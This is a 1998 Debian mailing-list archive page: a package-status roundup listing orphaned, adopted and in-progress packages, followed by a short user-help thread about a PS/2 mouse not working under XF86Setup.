   The tkhylafax, canna, and jless packages have been uploaded.
   
   Packages needing a new maintainer
 * The dosfstools package (mkdosfs and dosfsck) is offered by Martin
   Schulze ([EMAIL PROTECTED], IRC Joey).
 * The lx-gdb package is offered by ([EMAIL PROTECTED]).
 * The tkman package is offered by Yann Dirson
   ([EMAIL PROTECTED]).
 * The nn newsreader package is now orphaned.
   
   Packages adopted
 * The wwwoffle, tkstep4.2, tkstep8.0, and noweb packages are offered
   by Federico Di Gregorio ([EMAIL PROTECTED]).
 * The fvwm95 and tkdesk packages have been adopted by Daniel Martin
   at cush ([EMAIL PROTECTED]).
 * The xlockmore and xlockmore-gl packages are adopted by Herbert Xu
   ([EMAIL PROTECTED]).
 * The ipgraf package is adopted by Robert S. Edmonds
   ([EMAIL PROTECTED], IRC stu).
 * The doc-linux package is adopted by Marco Budde
   ([EMAIL PROTECTED]).
 * The presumably orphaned wordnet suite is adopted by Andreas Tille
   ([EMAIL PROTECTED]).
 * The splay and zoo packages are adopted by Petr Cech
   ([EMAIL PROTECTED]).
 * The sniffit and xzx packages are adopted by Damjan Marion
   ([EMAIL PROTECTED]).
   
   Packages being created
 * The gmp3 front-end for mpg123 is being packaged by Will Lowe
   ([EMAIL PROTECTED]).
 * Linbot, a HTML link checking program written in python, is being
   packaged by Jean Pierre LeJacq ([EMAIL PROTECTED]).
 * The must-have xteddy package is being created by Andreas Tille
   ([EMAIL PROTECTED]).
 * Packages for glbiff, kangband, and zangband are being created by
   Eric Leblanc ([EMAIL PROTECTED]).
 * A djgcc cross-compiler is being packaged by Lalo Martins
   ([EMAIL PROTECTED]).
 * A cdparanoia package is being created by ([EMAIL PROTECTED]).
 * Packages for colrconv, xconvers, gw4pts.morse, and z8530-utils are
   being created by Joop ([EMAIL PROTECTED]).
 * A package for gated is being investigated by Richard Nelson
   ([EMAIL PROTECTED], IRC cowboy), if the OSPF licensing is now
   less restrictive.
 * The FPK-pascal suite is being packaged by Jeff Shilt
   ([EMAIL PROTECTED]).
 * Packages for Rasterman's fnlib are being created by Shaleh
   ([EMAIL PROTECTED]).
 * TYA, a compiler from JVM bytecode to intel, is being worked on by
   Ruud de Rooij ([EMAIL PROTECTED]).
 * Packages for Gambit-C and scsh (based on Scheme48) are being
   created by Karl M. Hegbloom ([EMAIL PROTECTED]).
 * Login.app, a graphical login program, is being packaged by Marcelo
   Magallon ([EMAIL PROTECTED]).
   
   Packages someone could package for Debian 2.1
 * A libg++2.8 package for version 2.8.1.1.
 * Nessus Alpha 1 -- yet another security auditing tool.
 * The Java Development Environment wrapper for xemacs.
 * A pdftex package, for a version of TeX/LaTeX which directly
   generates PDF.
   
   
 _
   
   Orphaned packages
 

Re: Can't get my mouse to work

1998-04-07 Thread Jeff Katcher
Dan Winkler wrote:
SNIP
 The mouse is a PS/2 mouse.  It works fine under Windows 95.  It does not
 work at all under Linux.  When I run XF86Setup, I select PS/2 mouse and set
 the device to be /dev/psaux and apply the changes, but moving the mouse
 does not move the cursor. 
/SNIP

Does the mouse work before you apply the changes.  If so just don't
change anything!!

Jeff Katcher


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


  1   2   >